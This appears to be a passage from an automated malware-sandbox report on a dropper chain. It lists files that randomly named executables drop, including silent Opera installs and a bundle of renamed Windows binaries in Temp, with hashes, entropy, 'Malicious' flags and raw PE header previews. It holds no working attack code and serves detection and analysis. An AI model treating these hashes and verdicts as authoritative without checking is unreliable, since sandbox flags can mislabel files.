                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......!S...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\d192e6b4-4dc6-4f9e-ad8c-34b915fcdda7.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):217
                                                                                                                                                                                                                                Entropy (8bit):4.847701720310414
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:YSAILzPlouBDm4M5NW1RhQyiOJBJHksCW1RAQH8m4n:YSLrlZDm4M52iGBvfH8m4n
                                                                                                                                                                                                                                MD5:0877F3D72379DA38CEAC5792BC9FDD4F
                                                                                                                                                                                                                                SHA1:19423305BBC320D576F1337A750313818347BEAC
                                                                                                                                                                                                                                SHA-256:CB56400EB931EAA859366E9E6605082FAD1E82FE749210B817CEBCE9B34537DB
                                                                                                                                                                                                                                SHA-512:8B874F11E8D0C73578E01D2B9E2A971C51B68DADD33BFA6218D7096FF2219BB6CA37E16ADE02B985A5A388238B96644F4906523AC93FEB84F206D623E67719B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:{"welcome-url":"https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767__456&utm_medium=apb&utm_source=mkt&http_referrer=&query=/opera/stable/windows/?utm_medium=apb%26utm_source=mkt%26utm_campaign=767__456"}

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\installer_prefs_include.json (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):217
                                                                                                                                                                                                                                Entropy (8bit):4.847701720310414
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:YSAILzPlouBDm4M5NW1RhQyiOJBJHksCW1RAQH8m4n:YSLrlZDm4M52iGBvfH8m4n
                                                                                                                                                                                                                                MD5:0877F3D72379DA38CEAC5792BC9FDD4F
                                                                                                                                                                                                                                SHA1:19423305BBC320D576F1337A750313818347BEAC
                                                                                                                                                                                                                                SHA-256:CB56400EB931EAA859366E9E6605082FAD1E82FE749210B817CEBCE9B34537DB
                                                                                                                                                                                                                                SHA-512:8B874F11E8D0C73578E01D2B9E2A971C51B68DADD33BFA6218D7096FF2219BB6CA37E16ADE02B985A5A388238B96644F4906523AC93FEB84F206D623E67719B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:{"welcome-url":"https://redir.opera.com/www.opera.com/firstrun/?utm_campaign=767__456&utm_medium=apb&utm_source=mkt&http_referrer=&query=/opera/stable/windows/?utm_medium=apb%26utm_source=mkt%26utm_campaign=767__456"}

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232137541\opera_package

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):108904768
                                                                                                                                                                                                                                Entropy (8bit):7.999992128605643
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:3145728:YDgMyHlLTo4mgZPPi6fhDCU3QPoBLdydj+o:Y8MyHSVgZP66f+GLdy8o
                                                                                                                                                                                                                                MD5:4936231C48634B100429F03AD2DA9441
                                                                                                                                                                                                                                SHA1:AD9D994173CEAF384CE808B12F7D10563ECD8A1D
                                                                                                                                                                                                                                SHA-256:C5B7FCC93B1ED8B24F3C7BE9D736401F2AC8C5FCAA270092A58D735F5630F3A7
                                                                                                                                                                                                                                SHA-512:45C86456B42C64524729A2AD3F2B058EAFFF733200F376E7E346A84BEA9B0E55641DBDB22A7C79622BAD1B993A4B7B26E741F6848B61F84382B4E3E464407A66
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@...................................~......................................b........................}..)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404232138021\opera_package

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):75376868
                                                                                                                                                                                                                                Entropy (8bit):7.9999894437147185
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:1572864:YD25bzM5M7jd2r6lLcoo4V7eS8gZPPzSF6fhqqQBUCgBP:YDgMyHlLTo4mgZPPi6fhDCUP
                                                                                                                                                                                                                                MD5:6B64F2F89414D6D99135AF3049F690B7
                                                                                                                                                                                                                                SHA1:C553E7BA21866BAF8106281BC483A8E3D30F0142
                                                                                                                                                                                                                                SHA-256:B3135D41A0905E51963C5C635AEBB2B8A4410D83BDD07151B5ABDF7EE9317890
                                                                                                                                                                                                                                SHA-512:6F4E1B56AAC0A34B55C643F13E226DC1B42289231475CDAC1310AC30C57BE61AFA78C8AEE3E980BD22C550B5FF025E418D71B6F488BC4407959D28C5A2825C8F
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@...................................~......................................b........................}..)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\vU4jsQbpuBQoMcavMx7b1jzX.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5387648
                                                                                                                                                                                                                                Entropy (8bit):6.884110439415429
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:f0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwN:SPMki6zio75L3pf3dedO4keCIwkoYbgt
                                                                                                                                                                                                                                MD5:409B00F4B0A921D4691FE3EFB0AD4092
                                                                                                                                                                                                                                SHA1:C3F647B65D5C473D834CEBB04FB2DBC3E51CC83A
                                                                                                                                                                                                                                SHA-256:169282F6539507ABB50AAAB68EC6CFF09373DC3E6EB104F34BD762897221AFBE
                                                                                                                                                                                                                                SHA-512:C21EF7B0499D570870B493523AEB18F46700980B252507DBCC6F6D4E2791CD9F65197286DACE3D7B2F55160E500ECEE688B3DD5324DE7350B61913332006EA5D
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....C.R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213748763.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4576
                                                                                                                                                                                                                                Entropy (8bit):5.589736914921227
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:ecR5vxiKB+iDDdUsP95KeQX5glFuX5glcNwX5gl5X5glsX5glsX5glu8:ecRxJ/HJl5Kv5gm5gai5gD5gS5gS5gg8
                                                                                                                                                                                                                                MD5:FBA4B9071E9E62C5937CE6C5CE0F6A2C
                                                                                                                                                                                                                                SHA1:89291417D428C93A1172EBFD1C826BAF94B4FF58
                                                                                                                                                                                                                                SHA-256:8E593041B2EB5B54A643DD9FC22B329D59DC52F0A4A659CCEB122136480EC901
                                                                                                                                                                                                                                SHA-512:ADDB51480E95E30B2799FE73C3157B5671F1C0A80A8A53637B9A7F1651D7571184F16AF42CD38A01EA344F9738C4600540FDCDA1C66CC68A1C8B644C756FDAF1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[0423/213748.763:INFO:installer_main.cc(455)] Opera installer starting - version 109.0.5097.59 Stable.[0423/213748.763:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0.[0423/213748.763:INFO:installer_main.cc(480)] Uninstall:0.[0423/213748.763:INFO:installer_main.cc(481)] Silent:1.[0423/213748.763:INFO:installer_main.cc(482)] Run Immediately0.[0423/213748.763:INFO:installer_main.cc(484)] Backend0.[0423/213748.763:INFO:installer_main.cc(485)] Inside package0.[0423/213748.763:INFO:installer_main.cc(486)] Autoupdate:0.[0423/213748.763:INFO:payload_manager_impl.cc(97)] Reading Payload.[0423/213748.763:INFO:installer_main.cc(636)] Tracking data: ZTI5ZTU0MTIzODcyYTZhMTcyNGU3MDI0YTc5NjZhZWY1YjM4M2UyMTc2ZmY4MDlkMTdmM2VhZDJlYWYxNTkyZTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240423213755078.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (533)
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):4109
                                                                                                                                                                                                                                Entropy (8bit):5.609579175188986
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:DxtGY5UxiZB+imSU6nHOHAeMX5gl2X5glyNWVK:DOY5U4/m2uHAv5gw5gIGK
                                                                                                                                                                                                                                MD5:A5B63AB86A63EB9CF5198B523BE2BE84
                                                                                                                                                                                                                                SHA1:2BD63F8019953F7DCD13354E0D9913369E34E9F4
                                                                                                                                                                                                                                SHA-256:E9D8E3FC56303C5FA5470B2D97D77C830C13F20362808A9DB61C3A5054A9B894
                                                                                                                                                                                                                                SHA-512:2DC7289A810822176D42257A5D717310CF923CE31B599CF4B7BCD8B65B092007B27ABF1A2BE930FAF115A53F6C6780B2FEC183733E92A65A7D498E1161C8DD9F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[0423/213755.093:INFO:installer_main.cc(455)] Opera installer starting - version 109.0.5097.59 Stable.[0423/213755.093:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0.[0423/213755.093:INFO:installer_main.cc(480)] Uninstall:0.[0423/213755.093:INFO:installer_main.cc(481)] Silent:1.[0423/213755.093:INFO:installer_main.cc(482)] Run Immediately0.[0423/213755.093:INFO:installer_main.cc(484)] Backend0.[0423/213755.093:INFO:installer_main.cc(485)] Inside package0.[0423/213755.093:INFO:installer_main.cc(486)] Autoupdate:0.[0423/213755.093:INFO:payload_manager_impl.cc(97)] Reading Payload.[0423/213755.093:INFO:installer_main.cc(636)] Tracking data: NGJiNjYxNmIzODYzNTk4ODA1YmVjMmI1YzJiODU4YjA5ODFhYjZiMTMyYTUwNDZlY2EwMDdhZmRhNGNjYzNmZDp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7zS1198.tmp\ARP.EXE

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                Entropy (8bit):3.5332979736228234
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:wfMgzBSh6zuHkasb6STAr/aextOeILdvVngwoix66SmjLg5nWStmW:wV66q86S2lqdOtixrSmjE5J
                                                                                                                                                                                                                                MD5:05ED92AC05830BA09526D6231D4E8B1A
                                                                                                                                                                                                                                SHA1:1E6AA5C9B9EF1B3A0D502AC9BA91497421DA2116
                                                                                                                                                                                                                                SHA-256:733A75B43EC066455CD1DB33C77F7A18DC4BA45686D20FBA1B750E7F5856CAA7
                                                                                                                                                                                                                                SHA-512:4CCC5832A116368CF67B3DC9CDEA7ACB47CCFA05411D5CA932ACFDD1B4FA5F7B11C0E75AF405CF2677A51189441EB7B1F2D507B7963E3EC847DF221D6030525B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y4..U...U...U...-..=U..V-...U..V-...U..V-...U...U..WU..V-...U..V-...U..V-B..U..V-...U..Rich.U..................PE..d....4|..........."......@...`...... ..........@....................................+.....`.......... .......................................[..|.......(.......................0....U..T............................P..@...........PQ...............................text... 5.......@.................. ..`.rdata.......P... ...P..............@..@.data...`....p.......p..............@....pdata..............................@..@.rsrc...(...........................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7157248
                                                                                                                                                                                                                                Entropy (8bit):7.756166190918081
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:UG0rMh5vMNSBl4rs5EiJlLMBiLPUGylg28X3:U5QSWmkEiJlLMY7UGU/8n
                                                                                                                                                                                                                                MD5:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                SHA1:8E15D7C4B7812A1DA6C91738C7178ADF0FF3200F
                                                                                                                                                                                                                                SHA-256:F200984380D291051FC4B342641CD34E7560CADF4AF41B2E02B8778F14418F50
                                                                                                                                                                                                                                SHA-512:8FEB3DC4432EC0A87416CBC75110D59EFAF6504B4DE43090FC90286BD37F98FC0A5FB12878BB33AC2F6CD83252E8DFD67DD96871B4A224199C1F595D33D4CADE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R.......l.......m......zF...........b.h....b.l.....b.S....Rich...................PE..L......a..........................................@..........................P......m.m...@..........................................@...........................A.................................. .l.@............................................text...=........................... ..`.data............B`.................@....idata................l.............@..@.debug................l.............@....reloc...A.......B....l.............@..B.rsrc........@.......,m.............@..@........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7zS1198.tmp\appidpolicyconverter.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                Entropy (8bit):5.477136942248282
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:5z8HovO2mFvJESmeC9608TZ1hCdqn5P3h1URujKbMYYw9a6tIUXs7+eFkQoVhC8N:Roo2dFvJES69B8F1hnVURujKbMYYw9ah
                                                                                                                                                                                                                                MD5:670A933CB5C72952048FF28FE3F2F8DB
                                                                                                                                                                                                                                SHA1:7164A88DC523BDB46F2C068D6753EE77F832F390
                                                                                                                                                                                                                                SHA-256:6B594B0E5FE197A67D966C812C6229E0F99FA665BD4C4F3A190ED536D37CB27A
                                                                                                                                                                                                                                SHA-512:FF256868E85355EACC5D617A05CDEB7488BDC758301F256C2385EA81A0FCA1D7F2518F34CDDBDAAB3D11518F89E577B93486A4881DF6DA615A75557A79DF1BD0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U..............A.+..Z.....Z...........Z.....Z..9..Z.....Z.-....Z.....Rich...........PE..d................"......`.....................@.............................`......+.....`.......... ..........................................l....@..@....... ............P..........T...........................Pu..@............v..h............................text....R.......`.................. ..`.rdata..v....p.......p..............@..@.data...............................@....pdata.. ........ ..................@..@.didat..X....0.......0..............@....rsrc...@....@.......@..............@..@.reloc.......P.......P..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7zS1198.tmp\hh.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\i7gUU3MlvTwbsK8r3hAjzW0p.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                Entropy (8bit):2.6590314350435986
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:oikEYaNKFFB4HvTeEkbvRcDXOgW63deOzGmOgKKE2cx/dZm5GJ1KDJD/YWcb:BIaNKFH4PTeRbQ+uevK6mI1KD2Wcb
                                                                                                                                                                                                                                MD5:6E4F49AC5D02B7517DCE5A2777CFDBB1
                                                                                                                                                                                                                                SHA1:8E5F4A71774B6AF0ECFB81FFA9B29D2E8EFABE44
                                                                                                                                                                                                                                SHA-256:0209F862AA595E9E155644830F380E9753DC58357967EF8252FA2FC7EA717C7E
                                                                                                                                                                                                                                SHA-512:094CC4E23C76BA7C77A14413C62AC1DB0F13DB7DAFECC4BF166341FE60157E330D952D8A8800CEDCF3BCD3025197AACD70BB09FB81CCE950F86BA5EACACEC5DB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.....]..]..]A..\..]A..\..]A..\..]A..\..]..]%.]A..\..]A.P]..]A..\..]Rich..]........PE..d................."...... ...`......P..........@..........................................`.......... .......................................8..P....`.......P..................0...h4..T............................0..@...........P1..p............................text... ........ .................. ..`.rdata.......0.......0..............@..@.data........@.......@..............@....pdata.......P.......P..............@..@.rsrc........`... ...`..............@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\koEMGMU.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\7zS1198.tmp\Install.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7157248
                                                                                                                                                                                                                                Entropy (8bit):7.756166190918081
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:UG0rMh5vMNSBl4rs5EiJlLMBiLPUGylg28X3:U5QSWmkEiJlLMY7UGU/8n
                                                                                                                                                                                                                                MD5:E77964E011D8880EAE95422769249CA4
                                                                                                                                                                                                                                SHA1:8E15D7C4B7812A1DA6C91738C7178ADF0FF3200F
                                                                                                                                                                                                                                SHA-256:F200984380D291051FC4B342641CD34E7560CADF4AF41B2E02B8778F14418F50
                                                                                                                                                                                                                                SHA-512:8FEB3DC4432EC0A87416CBC75110D59EFAF6504B4DE43090FC90286BD37F98FC0A5FB12878BB33AC2F6CD83252E8DFD67DD96871B4A224199C1F595D33D4CADE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................R.......l.......m......zF...........b.h....b.l.....b.S....Rich...................PE..L......a..........................................@..........................P......m.m...@..........................................@...........................A.................................. .l.@............................................text...=........................... ..`.data............B`.................@....idata................l.............@..@.debug................l.............@....reloc...A.......B....l.............@..B.rsrc........@.......,m.............@..@........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937382151588.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4834208
                                                                                                                                                                                                                                Entropy (8bit):6.878934082977637
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:76666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwJ:dPMki6zio75L3pf3dedO4keCIwkoYbgZ
                                                                                                                                                                                                                                MD5:CB9F8AC8C123DE6EF018CD36E39D4A61
                                                                                                                                                                                                                                SHA1:30733F7B86743531636AFFC6E0394F9C3189B3D0
                                                                                                                                                                                                                                SHA-256:EA03FE24040A07D65144D51BC06535B2D5104CFC761934E8D2E6C12887F11481
                                                                                                                                                                                                                                SHA-512:11D4B2F2EB43258D26DBCB6E0F11A941685491E42EDA38A3A628E31D278F346B559F7B407AB658163D01A7576E57A49462B156073C71D8EB6621BF25DBD7B1AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."!......3..|.......L*......................................PK......YJ...@A......................... ;.m....!;......`=..4............I..)....I.D...\.:.......................:......73.............D,;.8.....;.`....................text...x.3.......3................. ..`.rdata...^...03..`....3.............@..@.data.........;..@...|;.............@....rodata......0=.......;............. ..`.tls....]....@=.......;.............@...CPADinfo0....P=.......;.............@....rsrc....4...`=..6....;.............@..@.reloc..D.....I.......G.............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Opera_installer_2404231937415374172.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4834208
                                                                                                                                                                                                                                Entropy (8bit):6.878934082977637
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:76666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwJ:dPMki6zio75L3pf3dedO4keCIwkoYbgZ
                                                                                                                                                                                                                                MD5:CB9F8AC8C123DE6EF018CD36E39D4A61
                                                                                                                                                                                                                                SHA1:30733F7B86743531636AFFC6E0394F9C3189B3D0
                                                                                                                                                                                                                                SHA-256:EA03FE24040A07D65144D51BC06535B2D5104CFC761934E8D2E6C12887F11481
                                                                                                                                                                                                                                SHA-512:11D4B2F2EB43258D26DBCB6E0F11A941685491E42EDA38A3A628E31D278F346B559F7B407AB658163D01A7576E57A49462B156073C71D8EB6621BF25DBD7B1AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."!......3..|.......L*......................................PK......YJ...@A......................... ;.m....!;......`=..4............I..)....I.D...\.:.......................:......73.............D,;.8.....;.`....................text...x.3.......3................. ..`.rdata...^...03..`....3.............@..@.data.........;..@...|;.............@....rodata......0=.......;............. ..`.tls....]....@=.......;.............@...CPADinfo0....P=.......;.............@....rsrc....4...`=..6....;.............@..@.reloc..D.....I.......G.............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Qg_Appv5.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\VtmtVe55Jwcf3rOGIU1yezyh.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):8538160
                                                                                                                                                                                                                                Entropy (8bit):7.894832692431241
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:PYATHrqMo097ughAPM6R5b9dXXvRRHmRqB7:PzLqMo09aghAk6Lnfm4B7
                                                                                                                                                                                                                                MD5:54D53F5BDB925B3ED005A84B5492447F
                                                                                                                                                                                                                                SHA1:E3F63366D0CC19D48A727ABF1954B5FC4E69035A
                                                                                                                                                                                                                                SHA-256:4D97E95F172CF1821EC078A6A66D78369B45876ABE5E89961E39C5C4E5568D68
                                                                                                                                                                                                                                SHA-512:F6A5B88E02E8F4CB45F8AAE16A6297D6F0F355A5E5EAF2CBBE7C313009E8778D1A36631122C6D2BCFEA4833C2F22DFD488142B6391B9266C32D3205575A8FF72
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...A..c.....................(t...................@.................................)....@......@..............................(4...0....r.............0P......x6...................................................................................text............................... ..`.itext..T........................... ..`.data...,'.......(..................@....bss.... S... ...........................idata..(4.......6..................@....didata.............................@....tls....<............2...................rdata...............2..............@..@.reloc..h6.......8...4..............@..B.rsrc.....r..0....r..l..............@..@.............@.......z..............@..@........................................................

